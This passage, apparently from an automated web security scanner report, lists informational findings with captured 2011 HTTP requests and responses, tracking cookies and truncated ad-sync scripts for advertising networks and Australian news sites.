Request

Response

20.6. http://cti.w55c.net/ct/cms-2-frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cti.w55c.net
Path:	/ct/cms-2-frame.html

Request

GET /ct/cms-2-frame.html HTTP/1.1
Host: cti.w55c.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDAAFUIkAAAAAABvfIgAAAAAAAgAIAAIAAAAAAP8AAAAECv9yGAAAAAAA9awPAAAAAABnti0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAqvHSTWKQ8j9xPQrXo3DzP6HTBjptoARAmpmZmZmZBUCh0wY6baAEQJqZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABP8pWz3WCwCky7VqPoER8p2P8LgmYiHMJbwA-5AAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-15.html%3Fcb%3D0.33166992268525064,Z%3D300x250%26_salt%3D1434180912%26anmember%3D514%26anprice%3D%26keyword%3Dsmh%2Fnews_other%26r%3D0%26rf%3Dhttp%253A%2F%2Fnews.smh.com.au%2Fbreaking-news-national%2Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html%26s%3D814544,c151e658-d95b-11e0-9465-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/html
Date: Wed, 07 Sep 2011 14:15:52 GMT
Expires: Wed, 07 Sep 2011 15:15:52 GMT
Last-Modified: Tue, 06 Sep 2011 19:41:48 GMT
Server: ECS (sjo/522F)
X-Cache: HIT
Content-Length: 4299

<html>
<head>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif',
   pixels=[],
   matchersConfig=[

...[SNIP]...

20.7. http://cti.w55c.net/ct/rubicon-cms2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cti.w55c.net
Path:	/ct/rubicon-cms2.html

Request

GET /ct/rubicon-cms2.html HTTP/1.1
Host: cti.w55c.net
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=3600
Content-Type: text/html
Date: Wed, 07 Sep 2011 14:14:33 GMT
Expires: Wed, 07 Sep 2011 15:14:33 GMT
Last-Modified: Wed, 03 Aug 2011 19:13:53 GMT
Server: ECS (sjo/5256)
X-Cache: HIT
Content-Length: 2622

<html>
<head>
</head>
<body>
<script type="text/javascript">

var cookie='wfivefivec',
   domain='w55c.net',
   cookiePrefix='match',
   pingURL='http://i.w55c.net/ping_match.gif?ei=RUBICON_MATCH',
...[SNIP]...

20.8. http://d3.zedo.com/jsc/d3/ff2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/cj/V12F568CAD2J-573I706K63342132177B6AK63720K63690QK63352QQP0G00G0Q06E0F03A000059/ HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Aug 2011 12:13:46 GMT
ETag: "22022cd-a35-4aa4dd85cb280"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 2613
Cache-Control: max-age=131686
Expires: Fri, 09 Sep 2011 02:49:04 GMT
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close


<html>
<head>
<script language="JavaScript">
var c3=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...

20.9. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Request

GET /a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi2=3165011.js^1^1315404895^1315404895&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses2=12338^6&12590^2; rdk=7725/12338; rdk15=0; ses15=12338^5&12590^3

Response

20.10. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Request

GET /a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk=7856/12590; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

20.11. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Request

GET /a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/ HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^1; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

20.12. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-2.html

Request

GET /a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^3; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568

Response

20.13. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Request

GET /data_sync?partner_id=77&exchange_id=9 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 07 Sep 2011 14:14:19 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 07-Sep-2011 14:13:59 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 572

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://tags.bluekai.com/site/2748?redir=http%3A%2F%2Fsegment-pixel.invitemedia.com%2Fset_partner_uid%3FpartnerID
...[SNIP]...

20.14. http://pixel.invitemedia.com/rubicon_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/rubicon_sync

Request

GET /rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/ HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=*

Response

20.15. http://resources.6pr.f2.com.au/myTalkNetwork/6pr/css/img/bg_weather.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.6pr.f2.com.au
Path:	/myTalkNetwork/6pr/css/img/bg_weather.gif

Request

GET /myTalkNetwork/6pr/css/img/bg_weather.gif HTTP/1.1
Host: resources.6pr.f2.com.au
Proxy-Connection: keep-alive
Referer: http://www.6pr.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 07 Sep 2011 14:14:50 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 162

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

20.16. http://resources.smh.com.au/common/media-common-1.0/css/output/common.skin.breakingnewsnational_min.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://resources.smh.com.au
Path:	/common/media-common-1.0/css/output/common.skin.breakingnewsnational_min.css

Request

GET /common/media-common-1.0/css/output/common.skin.breakingnewsnational_min.css HTTP/1.1
Host: resources.smh.com.au
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx
Content-Type: text/html
Content-Length: 162
Date: Wed, 07 Sep 2011 14:15:26 GMT
Connection: close
Vary: Accept-Encoding

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx</center>
</body>
</html>

20.17. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg/%22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg/%22

Request

GET /%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/02/06/tn_165705.jpg/%22 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351&title=Photo%20Galleries
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.2.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:31:30 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n43 ( lax-agg-n17), ms lax-agg-n17 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

20.18. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg/%22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg/%22

Request

GET /%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/07/13/tn_197121.jpg/%22 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351&title=Photo%20Galleries
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.2.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:31:24 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n43 ( lax-agg-n17), ms lax-agg-n17 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

20.19. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22

Request

GET /%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/23/tn_203731.jpg/%22 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351&title=Photo%20Galleries
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.2.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:21:09 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n51 ( lax-agg-n58), ms lax-agg-n58 ( backup-origin>CONN)
Cache-Control: max-age=120
Expires: Wed, 07 Sep 2011 14:23:09 GMT
Age: 0
Content-Length: 18
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive

20.20. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/25/tn_204251.jpg/%22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/25/tn_204251.jpg/%22

Request

GET /%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/25/tn_204251.jpg/%22 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351&title=Photo%20Galleries
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.2.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:31:22 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n43 ( lax-agg-n47), ms lax-agg-n47 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

20.21. http://tools.ntnews.com.au/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/30/tn_205931.jpg/%22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tools.ntnews.com.au
Path:	/%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/30/tn_205931.jpg/%22

Request

GET /%22http://tools.ntnews.com.au//admin/gallery_images/remote/2011/08/30/tn_205931.jpg/%22 HTTP/1.1
Host: tools.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://tools.ntnews.com.au/photo-gallery/photo_galleries_js.php?category_id=4561,4521,4501,90,4551,4351&title=Photo%20Galleries
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.2.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 14:31:32 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n43 ( lax-agg-n30), ms lax-agg-n30 ( origin>CONN)
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Length: 389
Content-Type: text/html
Connection: keep-alive

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

